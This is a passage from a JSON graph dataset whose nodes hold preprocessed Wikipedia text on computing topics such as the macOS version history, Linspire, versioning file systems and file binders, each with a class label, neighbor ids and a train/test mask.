found way churn iphone games look good feel viscerally exciting hollywood blockbusters like blockbusters sometimes left looking product lacks basic creativity basically events last game little incentive buy year asphalt",
    "neighbors": [
      9408,
      10080,
      1346,
      9732,
      9063,
      3561,
      7029,
      6940
    ],
    "mask": "Test"
  },
  {
    "node_id": 11255,
    "label": 9,
    "text": "Richard_P._Gabriel:richard p. gabriel richard p. gabriel born 1949 american computer scientist known work computing related programming language lisp especially common lisp best known work 1990 essay lisp good news bad news win big introduced phrase worse better set benchmarks lisp termed gabriel benchmarks published 1985 performance evaluation lisp systems became standard way benchmark lisp implementations born 1949 town merrimac northeastern massachusetts two dairy farmers studied northeastern university boston earned b.a mathematics 1967–1972 resides redwood city california wife jo son named joseph daughter named mariko doctor physical therapy los altos california subsequently pursued graduate studies mathematics mit 1972–73 tapped patrick winston become permanent member artificial intelligence ai lab mit funding difficulties made impossible retain gabriel tried start dave waltz ai lab university illinois urbana–champaign two years lab fell due general apathy time 1973–75 gabriel managed earn ms mathematics mathematical work gabriel admitted stanford university time 1975–1981 served teaching assistant john mccarthy founder lisp ported maclisp native operating system incompatible timesharing system waits earned phd computer science topic natural language generation wife kathy son around time became spokesperson league programming freedom earning phd continued work ai projects mccarthy although thesis advisor terry winograd eventually began working lawrence livermore national laboratory recruited several researchers programmers company lucid incorporated founded 1984 would leave 1992 survived 1994 gabriel various times president chairman lucid inc product company shipped lisp integrated development environment ide sun microsystems ’ reduced instruction set computer risc hardware architecture named sparc sidestepped main failure lisp machines essence rewriting lisp machine ide use cost-effective less moribund architecture time gabriel married second wife daughter later divorced second wife 1993 eventually lucid focus shifted ai winter ide c++ core component ide richard stallman ’ version emacs gnu emacs gnu emacs lucid ’ needs however several lucid programmers assigned help develop gnu emacs friction arose programmers stallman handle graphical user interface gui issues lucid forked emacs thus became mainly responsible birth would come called xemacs one hires another notable programmer jamie w. zawinski gabriel left lucid inc. good became vice president development parcplace systems 1994–1995 consultant among others aspen smallworks joining sun microsystems distinguished engineer gabriel influential contributor evolution open source software strategy culminating publication book innovation happens elsewhere 2007 joined ibm research distinguished engineer gabriel received association computing machinery acm 1998 fellows award 2004 acm-aaai allen newell award citation reads “ innovations programming languages software design promoting interaction computer science disciplines notably architecture poetry. ” chairman object-oriented programming systems languages applications oopsla conference 2007 1998 received mfa poetry warren wilson college published poems literary journals chapbook drive published hollyridge press 2005",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      10778,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      1613,
      9299,
      2135,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      1147,
      7805,
      1159,
      9865,
      3728,
      9877,
      5803,
      9391,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      3323,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      10012,
      3869,
      2335,
      2849,
      9507,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3389,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      1399,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      9665,
      4550,
      11218,
      9175,
      10712,
      3034,
      3051,
      5611,
      7670,
      5115
    ],
    "mask": "None"
  },
  {
    "node_id": 11256,
    "label": 6,
    "text": "Versioning_file_system:versioning file system versioning file system computer file system allows computer file exist several versions time thus form revision control common versioning file systems keep number old copies file limit number changes per minute per hour avoid storing large numbers trivial changes others instead take periodic snapshots whose contents accessed similar semantics normal file access ... versioning file system similar periodic backup several key differences versioning file systems provide features revision control systems however unlike revision control systems transparent users requiring separate commit step record new revision versioning file systems confused journaling file systems whereas journaling file systems work keeping log changes made file committing changes file system overwriting prior version versioning file system keeps previous copies file saving new changes two features serve different purposes mutually exclusive object storage implementations offers object versioning amazon s3 early implementation versioning possibly first mit filename consisted two six-character parts second part numeric consisted digits treated version number specifying file open read write one could supply second part reading meant open highest-numbered version file writing meant increment highest existing version number create new version writing another early implementation versioning tenex became tops-20 powerful example file versioning system built rsx-11 openvms operating system digital equipment corporation essence whenever application opens file writing file system automatically creates new instance file version number appended name version numbers start 1 count upward new instances file created application opens file reading either specify exact file name including version number file name without version number case recent instance file opened purge dcl/ccl command used time manage number versions specific directory default highest numbered versions files current directory deleted behavior overridden /keep=n switch and/or specifying directory path and/or filename patterns vms systems often scripted purge user directories regular schedule sometimes misconstrued end-users property versioning system mainstream linux file system supports versioning number experimental/research lesser-known solutions namely lisp machine file system supports versioning provided implementations mit lmi symbolics texas instruments operating system symbolics genera starting lion 10.7 macos feature called versions allows time machine-like saving browsing past versions documents applications written use versions functionality however takes place application layer filesystem layer lion later releases incorporate true versioning file system htfs adopted primary filesystem sco openserver 1995 supports file versioning versioning enabled per-directory basis setting directory setuid bit inherited subdirectories created versioning enabled new file version created file directory removed existing file opened truncation non-current versions remain filesystem namespace name original file suffix attached consisting semicolon version sequence number current version hidden directory reads unless showversions environment variable set versions otherwise accessible normal operations environment variable general accessibility allow versions managed usual filesystem utilities though also undelete command used purge restore files enable disable versioning directories etc following versioning filesystems allow similar functionality",
    "neighbors": [
      5120,
      2051,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9245,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      1147,
      11390,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      3757,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      9484,
      8461,
      6416,
      273,
      1810,
      6935,
      11033,
      287,
      1825,
      2338,
      6434,
      5413,
      3366,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      4919,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10590,
      9569,
      10596,
      2407,
      10087,
      10101,
      11638,
      6519,
      2424,
      376,
      890,
      11128,
      8572,
      2432,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      11201,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 11257,
    "label": 2,
    "text": "MacOS_version_history:macos version history history macos apple current mac operating system originally named mac os x 2012 os x 2016 began company project replace classic mac os system including final release mac os 9 direct descendant operating system apple used macintosh computers since introduction 1984 however current macos unix operating system built technology developed next 1980s apple purchased company early 1997 although originally marketed simply version 10 mac os indicated roman numeral x completely different codebase mac os 9 well substantial changes user interface transition technologically strategically significant one ease transition versions 10.4 able run mac os 9 applications compatibility layer first released 1999 mac os x server 1.0 widely released desktop version—mac os x 10.0—following march 2001 since several distinct desktop server editions macos released starting mac os x 10.7 lion macos server longer offered separate operating system instead server management tools available purchase add-on starting intel build mac os x 10.5 leopard releases certified unix systems conforming single unix specification macos retained major version number 10 throughout development history date releases macos also named big cats versions 10.0–10.8 locations california 10.9–present apple removed steve jobs management 1985 left company attempted create next big thing funding ross perot result next computer first workstation include digital signal processor dsp high-capacity optical disc drive next hardware advanced time expensive relative rapidly commoditizing workstation market marred design problems hardware phased 1993 however company object-oriented operating system nextstep lasting legacy nextstep based mach kernel developed cmu carnegie mellon university bsd implementation unix dating back 1970s featured object-oriented programming framework based objective-c language environment known today mac world cocoa also supported innovative enterprise objects framework database access layer webobjects application server development environment among notable features abandoning idea operating system next managed maintain business selling webobjects consulting services never commercial success nextstep underwent evolution openstep separated object layers operating system allowing run less modification platforms openstep short time adopted sun microsystems however point number companies — notably apple ibm microsoft even sun — claiming would soon releasing similar object-oriented operating systems development tools efforts taligent fully come fruition others like java gained widespread adoption february 4 1997 apple computer acquired next 427 million used openstep basis mac os x called time traces next software heritage still seen macos example cocoa development environment objective-c library classes ns prefixes history section manual page codice_1 command macos straightforwardly states command first appeared nextstep meanwhile apple facing commercial difficulties decade-old macintosh system software reached limits single-user co-operative multitasking architecture once-innovative user interface looking increasingly outdated massive development effort replace known copland started 1994 generally perceived outside apple hopeless case due political infighting conflicting goals 1996 copland nowhere near ready release project eventually cancelled elements copland incorporated mac os 8 released july 26 1997 considering purchase beos — multimedia-enabled multi-tasking os designed hardware similar apple company decided instead acquire next use openstep basis new os avie tevanian took os development steve jobs brought consultant first plan develop new operating system based almost entirely updated version openstep addition virtual machine subsystem — known blue box — running classic macintosh applications result known code name rhapsody slated release late 1998 apple expected developers would port software considerably powerful openstep libraries learned power flexibility instead several major developers adobe told apple would never occur would rather leave platform entirely rejection apple plan largely result string previous broken promises apple watching one next os another disappear apple market share dwindle developers interested much work platform let alone re-write apple financial losses continued board directors lost confidence ceo gil amelio asking resign board asked steve jobs lead company interim basis essentially giving carte blanche make changes return company profitability jobs announced world wide developer conference developers really wanted modern version mac os apple going deliver met thunderous applause next two years major effort applied porting original macintosh apis unix libraries known carbon mac os applications could ported carbon without need complete re-write making operate native applications new operating system meanwhile applications written using older toolkits would supported using classic mac os 9 environment support c c++ objective-c java python added furthering developer comfort new platform time lower layers operating system mach kernel bsd layers top re-packaged released apple public source license became known darwin darwin kernel provides stable flexible operating system takes advantage contributions programmers independent open-source projects outside apple however sees little use outside macintosh community period java programming language increased popularity effort started improve mac java support consisted porting high-speed java virtual machine platform exposing macos-specific cocoa apis java language first release new os — mac os x server 1.0 — used modified version mac os gui client versions starting mac os x developer preview 3 used new theme known aqua aqua substantial departure mac os 9 interface evolved little change original macintosh operating system incorporated full color scalable graphics anti-aliasing text graphics simulated shading highlights transparency shadows animation key new feature dock application launcher took advantage capabilities despite os x maintained substantial degree consistency traditional mac os interface apple apple human interface guidelines pull-down menu top screen familiar keyboard shortcuts support single-button mouse development aqua delayed somewhat switch openstep display postscript engine one developed in-house free license restrictions known quartz exception mac os x server 1.0 original public beta first several macos versions named big cats prior release version 10.0 code named cheetah internally apple version 10.1 code named internally puma code name jaguar version 10.2 received publicity media apple began openly using names promote operating system 10.3 marketed panther 10.4 tiger 10.5 leopard 10.6 snow leopard 10.7 lion 10.8 mountain lion panther tiger leopard registered trademarks apple registered lynx cougar allowed lapse apple instead using name iconic locations california subsequent releases 10.9 mavericks named mavericks popular surfing destination 10.10 yosemite named yosemite national park 10.11 el capitan named el capitan 10.12 sierra named sierra nevada mountain range 10.13 high sierra named area around high sierra camps september 13 2000 apple released 29.95 preview version mac os x internally codenamed kodiak order gain feedback users marked first public availability aqua interface apple made many changes ui based customer feedback mac os x public beta expired ceased function spring 2001 march 24 2001 apple released mac os x 10.0 internally codenamed cheetah initial version slow incomplete applications available time launch mostly independent developers many critics suggested operating system ready mainstream adoption recognized importance initial launch base improve simply releasing mac os x received macintosh community great accomplishment attempts completely overhaul mac os underway since 1996 delayed countless setbacks following bug fixes kernel panics became much less frequent mac os x 10.1 internally codenamed puma released september 25 2001 better performance provided missing features dvd playback apple released 10.1 free upgrade cd 10.0 users apple released upgrade cd mac os 9 january 7 2002 apple announced mac os x default operating system macintosh products end month august 23 2002 apple followed mac os x 10.2 jaguar first release use code name part branding brought great raw performance improvements sleeker look many powerful user-interface enhancements 150 according apple including quartz extreme compositing graphics directly ati radeon nvidia geforce2 mx agp-based video card least 16 mb vram system-wide repository contact information new address book instant messaging client named ichat happy mac appeared mac os startup sequence almost 18 years replaced large grey apple logo introduction mac os x 10.2 mac os x panther released october 24 2003 addition providing much improved performance also incorporated extensive update yet user interface panther included many new features jaguar year including updated finder incorporating brushed-metal interface fast user switching exposé window manager filevault safari ichat av added videoconferencing features ichat improved portable document format pdf rendering much greater microsoft windows interoperability support early g3 computers power macintosh powerbook discontinued mac os x tiger released april 29 2005 apple stated tiger contained 200 new features panther certain older machines longer supported tiger requires mac built-in firewire port among new features tiger introduced spotlight dashboard smart folders updated mail program smart mailboxes quicktime 7 safari 2 automator voiceover core image core video initial release apple tv used modified version tiger different graphical interface fewer applications services january 10 2006 apple released first intel-based macs along 10.4.4 update tiger operating system functioned identically powerpc-based macs new intel-based machines exception intel release dropping support classic environment powerpc macs booted retail copies tiger client dvd universal dvd tiger server 10.4.7 8k1079 boot powerpc intel macs mac os x leopard released october 26 2007 called apple largest update mac os x leopard supports powerpc- intel x86-based macintosh computers support g3 processor dropped g4 processor required minimum clock rate 867 mhz least 512 mb ram installed single dvd works supported macs including 64-bit machines new features include new look updated finder time machine spaces boot camp pre-installed full support 64-bit applications including graphical applications new features mail ichat number new security features leopard open brand unix 03 registered product intel platform also first bsd-based os receive unix 03 certification leopard dropped support classic environment classic applications final version mac os x support powerpc architecture mac os x snow leopard released august 28 2009 last version available disc rather delivering big changes appearance end user functionality like previous releases development snow leopard deliberately focused hood changes increasing performance efficiency stability operating system users noticeable changes disk space operating system frees clean installation compared mac os x 10.5 leopard responsive finder rewritten cocoa faster time machine backups reliable user friendly disk ejects powerful version preview application well faster safari web browser update introduced support mac app store apple digital distribution platform macos applications subsequent macos upgrades snow leopard supports machines intel cpus requires least 1 gb ram drops default support applications built powerpc architecture rosetta installed additional component retain support powerpc-only applications mac os x lion released july 20 2011 brought developments made apple ios easily navigable display installed applications launchpad greater use multi-touch gestures mac release removed rosetta making incapable running powerpc applications dropped support 32-bit intel processors requires 2gb memory changes made gui graphical user interface include launchpad similar home screen ios devices auto-hiding scrollbars appear used mission control unifies exposé spaces dashboard full-screen applications within single interface apple also made changes applications resume state closed similar ios documents auto-save default os x mountain lion released july 25 2012 incorporates features seen ios 5 include game center support imessage new messages messaging application reminders to-do list app separate ical renamed calendar like ios app also includes support storing iwork documents icloud 2gb memory required notification center makes debut mountain lion desktop version similar one ios 5.0 higher application pop-ups concentrated corner screen center pulled right side screen mountain lion also includes chinese features including support baidu option safari search engine notification center added providing overview alerts applications notes added application separate mail synching ios counterpart icloud service messages instant messaging software application replaces ichat os x mavericks released october 22 2013 free update mac app store worldwide placed emphasis battery life finder enhancements enhancements power users continued icloud integration well bringing apple ios apps os x platform ibooks apple maps applications added mavericks requires 2gb memory operate first version named apple then-new theme places california dubbed mavericks surfing location unlike previous versions os x progressively decreasing prices since 10.6 10.9 available charge users compatible systems running snow leopard 10.6 later beginning apple policy free upgrades life operating system business software os x yosemite released general public october 16 2014 free update mac app store worldwide featured major overhaul user interface replaced skeuomorphism flat graphic design blurred translucency effects following aesthetic introduced ios 7 introduced features called continuity handoff allow tighter integration paired os x ios devices user handle phone calls text messages either mac iphone edit pages document either mac ipad later update os included photos replacement iphoto aperture os x el capitan revealed june 8 2015 wwdc keynote speech made available public beta july made available publicly september 30 2015 apple described release containing refinements mac experience improvements system performance rather new features refinements include public transport built maps application gui improvements notes application well adopting san francisco system font metal api application enhancing software debuted operating system available macs since 2012 macos sierra announced june 13 2016 wwdc keynote speech update brought siri macos featuring several mac-specific features like searching files also allowed websites support apple pay method transferring payment using either nearby ios device touch id authenticate icloud also received several improvements ability store user ’ desktop documents folders icloud could synced macs apple id released publicly september 20 2016. macos high sierra announced june 5 2017 wwdc keynote speech released september 25 2017 release includes many under-the-hood improvements including switch apple file system apfs introduction metal 2 support hevc video improvements vr support addition numerous changes made standard applications including photos safari notes spotlight macos mojave announced june 4 2018 wwdc keynote speech released september 24 2018 key new features dark mode desktop stacks dynamic desktop changes desktop background image correspond user current time day macos catalina announced june 3 2019 wwdc keynote speech primarily focuses updates built-in apps replacing itunes separate music podcasts tv apps redesigned reminders books apps new find app also features sidecar allows user use ipad second screen computer even simulate graphics tablet apple pencil first version macos support 32-bit applications",
    "neighbors": [
      10755,
      9732,
      4615,
      1549,
      5647,
      7697,
      1042,
      4114,
      11289,
      6186,
      6700,
      5677,
      4657,
      1074,
      8754,
      9784,
      8253,
      8767,
      576,
      8774,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      4184,
      10838,
      9308,
      2141,
      4702,
      3167,
      3681,
      9826,
      2149,
      5733,
      8806,
      3691,
      8303,
      8304,
      6771,
      2676,
      6264,
      5243,
      2686,
      6783,
      7806,
      9343,
      10878,
      3719,
      10888,
      8842,
      7307,
      11402,
      6797,
      8852,
      1686,
      7318,
      5784,
      1177,
      4251,
      3228,
      2207,
      1699,
      11430,
      3241,
      171,
      5292,
      8877,
      1710,
      2735,
      3248,
      3766,
      2232,
      9912,
      4283,
      7869,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      7378,
      3286,
      9430,
      3289,
      3293,
      4318,
      10470,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      2288,
      242,
      7928,
      8441,
      11513,
      7422,
      11521,
      2819,
      1796,
      1290,
      9487,
      784,
      9999,
      10512,
      4888,
      11037,
      10023,
      811,
      3371,
      4399,
      7983,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      4933,
      838,
      9035,
      2383,
      2388,
      1878,
      6495,
      9063,
      4457,
      8554,
      10602,
      3948,
      11629,
      10608,
      5492,
      9589,
      6023,
      7561,
      6539,
      9100,
      1428,
      9109,
      3483,
      1439,
      2979,
      9123,
      11171,
      11173,
      10153,
      8109,
      2492,
      446,
      7614,
      9151,
      9665,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      6608,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      10221,
      7154,
      499,
      5619,
      7163,
      8700,
      2045,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 11258,
    "label": 9,
    "text": "NPL_(programming_language):npl programming language npl functional programming language pattern matching designed rod burstall john darlington 1977 language allows certain sets logic constructs appear right hand side definitions e.g npl interpreter evaluates list generators left right conditions mention bound variables occur left known set comprehensions npl eventually evolved hope lost set comprehensions made reappearance form list comprehensions later functional languages",
    "neighbors": [
      8262,
      5623
    ],
    "mask": "None"
  },
  {
    "node_id": 11259,
    "label": 8,
    "text": "Li3_(software):li3 software li₃ formerly lithium full-stack web framework producing web applications written php supporting php 5.3 onwards based model–view–controller development architecture described adhering no-nonsense philosophies project sponsored engine yard radify atelier disko october 2009 cakephp project manager garrett woodworth developer nate abele resigned project focus lithium framework code base originally developed cakephp project cake3 2012 project gained official sponsorship engine yard january 2014 project rebranded name li₃ release version 1.0 june 6th 2016 david persson followed nate abele lead developer project",
    "neighbors": [
      1920,
      3462,
      8582,
      1034,
      6154,
      2062,
      9614,
      2576,
      148,
      1812,
      6941,
      9245,
      10526,
      2465,
      8739,
      3876,
      4777,
      2348,
      5165,
      7983,
      4529,
      7987,
      692,
      8883,
      5048,
      6074,
      190,
      6338,
      9666,
      2372,
      8644,
      1353,
      4171,
      595,
      84,
      4056,
      10587,
      6493,
      11357,
      3553,
      102,
      9320,
      7785,
      8554,
      7147,
      5612,
      8691,
      4853,
      3705,
      11259,
      7293
    ],
    "mask": "None"
  },
  {
    "node_id": 11260,
    "label": 7,
    "text": "IQRF:iqrf iqrf technology wireless packet-oriented communication via radio frequency rf sub-ghz ism bands intended general use wireless connectivity needed either point-to-point complex networks e.g telemetry industrial control automation buildings cities internet things fully open functionality depends solely user-specific application basic iqrf communication device transceiver module tr including mcu built-in operating system os implementing link layer network layer supporting mesh networking utilizing iqmesh protocol application software written directly os c language unlike solution stack used e.g zigbee application program compiled development higher communication level transport layer dpa optional open protocol framework enabling control sending commands receiving responses via standard wired interface uart spi via rf dpa implemented ready-to-use software plug-in called hardware profile hwp uploaded transceiver programming needed however possible modify existing hwp functionality user-specific custom dpa handler programmed c. transceivers supporting dpa called dctr data controlled transceivers iqrf connectivity 3rd party devices programmable c java supported open source development sdk package iqrf sdk gateways datalogger option lan connectivity utilize cloud server providing plug-and-play worldwide access end iqrf wireless devices iqrf alliance international community developers manufacturers system integrators others engaged wireless connectivity based iqrf technology main goal interoperability products dctrs inside",
    "neighbors": [
      11267,
      2948,
      2920,
      5677,
      7983,
      10005,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 11261,
    "label": 3,
    "text": "Yamaha_V9958:yamaha v9958 yamaha v9958 video display processor used msx2+ msx turbo r series home computers tim upgrade ti-99/4a also known msx-video chip successor yamaha v9938 main new features three graphical yjk modes 19268 colours horizontal scrolling registers v9958 widely adopted v9938 following features added removed yamaha v9938 specifications msx screen modes often referred assigned number msx-basic mapping follows",
    "neighbors": [
      10018,
      11462,
      9006,
      1403,
      11487
    ],
    "mask": "None"
  },
  {
    "node_id": 11262,
    "label": 2,
    "text": "Separation_of_mechanism_and_policy:separation mechanism policy separation mechanism policy design principle computer science states mechanisms parts system implementation control authorization operations allocation resources dictate overly restrict policies according decisions made operations authorize resources allocate commonly discussed context security mechanisms authentication authorization actually applicable much wider range resource allocation problems e.g cpu scheduling memory allocation quality service general question good object abstraction per brinch hansen introduced concept separation policy mechanism operating systems rc 4000 multiprogramming system artsy livny 1987 paper discussed approach operating system design extreme separation mechanism policy 2000 article chervenak et al described principles mechanism neutrality policy neutrality separation mechanism policy fundamental approach microkernel distinguishes monolithic one microkernel majority operating system services provided user-level server processes important operating system flexibility providing adequate mechanisms support broadest possible spectrum real-world security policies almost impossible envision different ways system might used different types users life product means hard-coded policies likely inadequate inappropriate perhaps even potential users decoupling mechanism implementations policy specifications makes possible different applications use mechanism implementations different policies means mechanisms likely better meet needs wider range users longer period time possible enable new policies without changing implementing mechanisms costs risks policy changes greatly reduced first instance could accomplished merely segregating mechanisms policies distinct modules replacing module dictates policy e.g cpu scheduling policy without changing module executes policy e.g scheduling mechanism change behaviour system cases wide variable range policies anticipated depending applications needs makes sense create non-code means specifying policies i.e policies hardcoded executable code specified independent description instance file protection policies e.g unix user/group/other read/write/execute might parametrized alternatively implementing mechanism could designed include interpreter new policy specification language cases systems usually accompanied deferred binding mechanism e.g late binding configuration options via configuration files runtime programmability via apis permits policy specifications incorporated system replaced another delivered customer everyday example mechanism/policy separation use card keys gain access locked doors mechanisms magnetic card readers remote controlled locks connections security server impose limitations entrance policy people allowed enter doors times decisions made centralized security server turn probably makes decisions consulting database room access rules specific authorization decisions changed updating room access database rule schema database proved limiting entire security server could replaced leaving fundamental mechanisms readers locks connections unchanged contrast issuing physical keys want change open door issue new keys change lock intertwines unlocking mechanisms access policies hotel significantly less effective using key cards",
    "neighbors": [
      11361,
      8259,
      9507,
      7368,
      745,
      4201,
      5452,
      7983,
      5363,
      7187,
      1013,
      7483
    ],
    "mask": "None"
  },
  {
    "node_id": 11263,
    "label": 2,
    "text": "Linspire:linspire linspire commercial operating system based debian gnu/linux ubuntu currently owned pc/opensystems llc 2001 2008 owned linspire inc. 2008 2017 xandros july 1 2008 linspire stockholders elected change company name digital cornerstone assets acquired xandros august 8 2008 andreas typaldos ceo xandros announced linspire would discontinued favor xandros freespire would change base code ubuntu debian linspire brand would cease exist january 1 2018 announced pc/opensystems llc purchased linspire freespire xandros linspire 7 available 79.99 freespire 3 available free based san diego california lindows inc. founded august 2001 michael robertson goal developing linux-based operating system capable running major microsoft windows applications based windows compatibility wine api company later abandoned approach favor attempting make linux applications easy download install use end program named cnr developed based debian advanced packaging tool provides easy-to-use graphical user interface slightly modified package system annual fee first public release lindows version 1.0 released late 2001 2002 microsoft sued lindows inc. claiming name lindows constituted infringement windows trademark microsoft claims rejected court asserted microsoft used term windows describe graphical user interfaces windows product ever released windowing technique already implemented xerox apple computer many years microsoft sought retrial postponed february 2004 offered settle case part licensing settlement microsoft paid estimated 20 million lindows inc. transferred lindows trademark microsoft changed name linspire inc. 15 june 2005 michael robertson stepped ceo linspire inc continues chairman replaced ceo kevin carmony carmony resigned linspire july 31 2007 linspire became member interop vendor alliance founded 2006 february 8 2007 linspire inc. canonical ltd lead sponsor developer ubuntu operating system announced plans new technology partnership linspire aiming begin basing ... desktop linux offerings ubuntu 13 june 2007 linspire microsoft announced interoperability collaboration agreement focus document format compatibility instant messaging digital media web search patent covenants linspire customers agreement criticised notably groklaw website disingenuously short-lived limited spirit gnu general public license kevin carmony one regular linspire letters asserted agreement would bring even choices desktop linux users ... offer better linux experience linspire bases product code names fish found near headquarters linspire/lindowsos 4.5 code named coho linspire five-0 5.0 5.1 freespire 1.0 marlin freespire 2.0 linspire 6.0 skipjack linspire cnr originally click n'run software distribution service based debian apt designed serve gui-based user-accessible means downloading installing various applications free proprietary service allowed users install available applications using single click cnr also included set click buy cnb software included many commercial applications members discounted rate cnr 38,000 different software packages ranging simple applications major commercial works win4lin staroffice cnr originally subscription-based two tiers basic service cost 20 annually gold featuring discounts commercial applications 50 2006 linspire announced basic service made available free linspire planned port cnr ubuntu distribution company announced april 24 2006 cnr would released open source license release free cnr client planned coincide release freespire 2.0 linspire 6.0 january 23 2007 linspire announced intended provide cnr linux distributions apt- rpm-based including debian fedora opensuse ubuntu support expected appear mid-2007 february 8 2007 linspire inc. announced partnership canonical ltd. publisher ubuntu linux distribution deal would see linspire freespire migrate unpredictable debian release process semiannual ubuntu release cycle intended main ubuntu distribution would become first recipient opening click n'run service linux distributions besides linspire august 2005 andrew betts released freespire live cd based linspire users mistook product linspire inc. linspire inc. offered users free linspire purchase price discounted 0 using coupon code freespire september 9 2005 april 24 2006 linspire announced project named freespire followed model community-oriented releases red hat novell form fedora opensuse freespire community-driven -supported project tied commercial linspire distribution included previously proprietary elements linspire cnr client elements linspire inc. licenses like windows media audio compatibility libraries remain closed-source consequently two versions freespire one closed source libraries one called freespire oss edition includes open-source components freespire 1.0 released august 7 2006 three weeks ahead schedule known freespire change code base ubuntu debian future releases july 10 2007 linspire released linspire 6.0 based freespire 2.0 final release freespire 2.0.8 released 30 november 2007 based ubuntu 7.04 supported 18 months reached end-of-life 19 october 2008 freespire therefore receives security updates upstream present distribution considered discontinued distrowatch linspire inc. sponsored open source projects including pidgin kopete instant messaging clients mozilla firefox web browser reiserfs file system nvu wysiwyg website editor kde-apps.org kde-look.org websites past linspire hosted several linux open source events annual desktop linux summit debconf kde developers conference linspire drawn criticism linux free software community included criticism including proprietary software gnu founder richard stallman commenting gnu/linux distribution backslided far away freedom switching ms windows linspire bring freedom gets different master addition following initial freespire announcement pamela jones groklaw website published article entitled freespire linux distro could n't care less freedom highly critical linspire inc. freespire project including closed-source components advertising favourable point—an action classed ignoring free open-source software foss community values community-driven distribution asserting free software n't proprietary drivers proprietary codecs drivers applications open source open way response linspire inc. ceo kevin carmony stated via journalist linspire website ten years holding foss community made relatively gains many users already using proprietary software although would hold would prefer something works rather nothing also asserted company believed open source software also freedom individuals choose whatever software want",
    "neighbors": [
      4123,
      9253,
      11305,
      56,
      3131,
      59,
      4673,
      3654,
      1107,
      1110,
      6230,
      5721,
      1632,
      4192,
      3685,
      9324,
      10860,
      2671,
      3189,
      5755,
      11388,
      1150,
      8837,
      6797,
      2194,
      10394,
      673,
      3745,
      3245,
      7854,
      2738,
      4790,
      8907,
      5343,
      4841,
      6890,
      7913,
      9455,
      7920,
      5363,
      9971,
      9461,
      6393,
      5369,
      8957,
      7435,
      2321,
      5397,
      4887,
      8476,
      5410,
      10530,
      3876,
      7983,
      823,
      7483,
      3903,
      2375,
      5962,
      4951,
      2914,
      9064,
      7020,
      7534,
      2930,
      9074,
      1396,
      10127,
      3478,
      7070,
      10149,
      8112,
      439,
      10687,
      4039,
      9693,
      3550,
      11232,
      6625,
      7140,
      485,
      5096,
      8177
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11264,
    "label": 1,
    "text": "Seabird_Colony_Register:seabird colony register seabird colony register scr database managed british joint nature conservation committee contains counts breeding seabirds british seabird colonies made 1969 1998 used analysing past changes breeding seabird numbers changes colony size britain ireland data included scr include results two complete seabird censuses britain ireland operation seafarer 1969/70 seabird colony register census 1985–1987 well ad hoc counts counts surveys data held 25 species seabird breeding throughout britain ireland scr partially superseded seabird 2000 database",
    "neighbors": [
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11265,
    "label": 9,
    "text": "Mohol_programming_languages:mohol programming languages mohol refers machine oriented high order languages dijkstra terminology",
    "neighbors": [
      3529,
      8262,
      11295
    ],
    "mask": "Test"
  },
  {
    "node_id": 11266,
    "label": 4,
    "text": "File_binder:file binder file binders utility software allow user bind multiple files together resulting single executable commonly used hackers insert programs trojan horses otherwise harmless files making difficult detect malware builders keyloggers stealers often include binder default polymorphic packer file binder ability make signature mutate time difficult detect remove commonly used hackers insert malware packages contain user content",
    "neighbors": [
      10208,
      1892,
      901,
      10756,
      9800,
      4649,
      7851,
      9771,
      5261,
      11197,
      7515,
      4956,
      10141
    ],
    "mask": "None"
  },
  {
    "node_id": 11267,
    "label": 7,
